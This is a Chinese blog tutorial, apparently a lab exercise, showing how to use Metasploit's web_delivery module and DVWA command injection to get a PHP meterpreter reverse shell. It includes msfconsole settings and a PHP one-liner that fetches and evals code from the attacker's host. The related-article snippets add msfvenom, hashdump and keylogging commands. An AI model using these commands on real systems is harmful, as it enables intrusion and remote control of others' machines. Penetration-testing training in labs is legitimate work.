使用Metasploit web_delivery 反弹shell

最新推荐文章于 2024-04-21 12:44:28 发布
最新推荐文章于 2024-04-21 12:44:28 发布
阅读量5.3k 收藏 4
点赞数
分类专栏: WEB安全 技术分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/113742356
版权

Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。

此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。

当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效载荷都在攻击机器上,所以攻击继续进行而没有写入磁盘。这有助于保持攻击指纹低。

这是在Metasploitable中的Damn Vulnerable Web Application(DVWA)上执行此模块的一个示例。

点击左侧面板中的“DVWA Security”。将安全级别设置为“low”,然后单击“Submit”。
在这里插入图片描述
首先,我们检查简单的命令执行。

点击“Command Execution”。输入一个IP地址,后跟一个分号和您希望执行的命令。
在这里插入图片描述

接下来开始使用MSF

msf6 > use exploit/multi/script/web_delivery
msf6 exploit(multi/script/web_delivery) > set target php
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.61.145
msf6 exploit(multi/script/web_delivery) > run

在这里插入图片描述

然后让目标执行

php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.61.145:8080/TjacnU4Z44g2DuK', false, stream_context_create(['ssl'=>['verify_pe
er'=>false,'verify_peer_name'=>false]])));"

在这里插入图片描述

得到shell

在这里插入图片描述

大方子
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用 metasploit 创建并反弹 shell
2301_78457119的博客
06-29 335
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。1 环境准备1.开启Kali虚拟机和bee-box靶机1.首先用 msfvenom 生成一个反弹 shell 的程序,将返回的连接地址修改为kali的 ip 地址。在 kali 中打开终端,输入:当我们在服务器。
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 463
知识是不断从学习中得到的,经验是从尝试中得到的!
反弹shell 看这一篇就够了
最新发布
m0_69043895的博客
04-21 1499
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
利用Metasploit获取linux反弹shell的尝试
weixin_42324313的博客
08-19 9643
序 接《Metasploit使用RPC方式复现一个Linux提权漏洞》。 由于刚刚入手,对很多概念和技术不慎了解,对RPC,mfsd,反弹shell等技术的理解有限,甚至有所偏差,导致前面做的探索差强人意。虽然最后建立了攻击机与靶机之间的连接,并且拿到shell和root权限,但是不能算是真正意义上的Metasploit使用RPC方式复现一个Linux提权漏洞。 还需要继续进行探索,具体什么...
Metasploit 生成***反弹shell
weixin_34372728的博客
04-27 2493
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报特点:这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的...
利用 metasploit 创建反弹 shell实验
m0_68638628的博客
07-01 206
metasploit是一款开源的安全漏洞检测工具,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,是世界上使用最多的渗透实用程序。Metaloit的设计初衷是打造成一个攻击工具开发平台,IT专业人士借助其识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
php如何检测在另一台设备登录怎么做_如何使用MetasploitWeb Delivery Script和命令注入弹出Shell(翻译)...
weixin_39950010的博客
12-13 158
Web交付概述Metasploit包含一个有用的模块,它在你的的设备上创建的服务器上承载一个负载。一旦目标设备连接到服务器并执行负载,就会运行web交付脚本。这个模块是通用的,因为它可以面向Python、Powershell和PHPapplications。web递交脚本的主要优势是隐藏。服务器和负载都驻留在你的设备上,因此在执行攻击时,不会将任何内容写入目标的磁盘,从而降低了触发防病毒应用程序和...
MASTERING_METASPLOIT_THIRD_EDITION_metasploitframework_
10-02
通过学习《Mastering Metasploit Framework》第三版,读者不仅能掌握Metasploit使用技巧,还能加深对网络安全攻防的理解,提升安全防护能力。书中的PDF文件包含了详细的章节和实例,是深入学习Metasploit的宝贵...
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
在安全领域,了解并掌握如何使用Metasploit对于提升网络防御能力至关重要。 渗透测试是一种模拟黑客攻击的合法行为,旨在评估和改善系统的安全性。Metasploit提供了一个全面的平台,集成了大量的exploits、payloads...
metasploit-lowlevel_metasploit_
10-02
Metasploit低级别利用详解》 ...它会详细解释如何使用Metasploit开发和调试exploits,同时提供实战案例,帮助你加深对低级别利用的理解。通过学习,你不仅可以提升安全技能,还能更好地预防和应对潜在的威胁。
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
通过阅读《Metasploit渗透测试指南》PDF文件,读者将更深入地了解Metasploit使用技巧,如何构建和执行渗透测试计划,以及如何利用Metasploit进行有效的安全评估。这份指南不仅适合初学者,也对经验丰富的安全专业...
07-SCADA_Metasploit_Modules.xlsx
10-10
Metasploit中工控设备的攻击模块清单
反弹shell提权linux,【我i原创】Metasploit反弹shell + 嗅探 + 域提权
weixin_42498641的博客
05-13 278
[size=13.3333px]sessions -i 1 //打开建立的第一个会话getuid //查看UIDsysinfo //查看攻击主机的系统信息run hashdump //dump目标主机的hash帐号信息,备份进行暴破ps //查看目标主机进程migrate 1576(pid) //切换自己为管理员,1576是管理员的进程IDgetuidkeyscan_start //开启健盘记录功...
Metasploit实验:android内网的反弹控制
wjwqp的专栏
04-11 480
一。测试环境: 实验环境:kali下Metasploit,kali无线网络环境1(外网180.91.xx.xx,内网:192.168.0.XX): 安卓手机:oppo R17.无线网络环境2(外网180.80.xx.xx,内网:192.168.1.XX): 思路:制作payload,攻击,映射端口 二、准备:一个ngrok帐号。 2.1没有可以去注册:htt...
Metasploit 生成反弹连接木马
qq_26002283的博客
04-01 1325
“注 本文为笔者学习过程中记录” Step1 :msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=12345 -i 5 -f exe -o /test.exe 生成一个名为 test.exe 的木马文件到msf目录下 Step2: 通过 msfconsole 命令进入metasploit : Step3...
metasploitwebdelivery
Yale的博客
01-31 1251
介绍下webdelivery模块 先是启动metasploit 接下来选择我们使用的模块 Show options看看我们需要设置哪些参数 我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看 2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,...
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1142
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
Msf - web_delivery
Nixawk
02-22 1844
Python Payload Modemsf exploit(web_delivery) > show options Module options (exploit/multi/script/web_delivery): Name Current Setting Required Description ---- --------------- --------
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2490
一条命令上线MSF(Metasploit)-web_delivery模块
metasploit 反弹shell
10-16
Metasploit 是一款常用的渗透测试工具,可以用来测试网络安全。反弹 shellMetasploit 中的一个常用功能,可以通过它在目标机器上执行命令或者获取目标机器的控制权。具体操作步骤如下: 1. 打开 Metasploit 控制台,输入以下命令: ``` use exploit/multi/handler set PAYLOAD <payload> set LHOST <attacker IP> set LPORT <attacker port> run ``` 其中,`<payload>` 是要使用的 payload,常用的有 `windows/meterpreter/reverse_tcp`、`linux/x86/meterpreter/reverse_tcp` 等;`<attacker IP>` 是攻击者的 IP 地址;`<attacker port>` 是攻击者监听的端口号。 2. 在目标机器上执行以下命令: ``` msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> > shell.<format> ``` 其中,`<payload>`、`<attacker IP>`、`<attacker port>` 与上面的命令相同;`<format>` 是输出格式,常用的有 `exe`、`elf`、`asp` 等。 3. 将生成的 shell 文件上传到目标机器上,并执行以下命令: ``` ./shell.<format> ``` 4. 回到 Metasploit 控制台,可以看到已经成功反弹shell

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值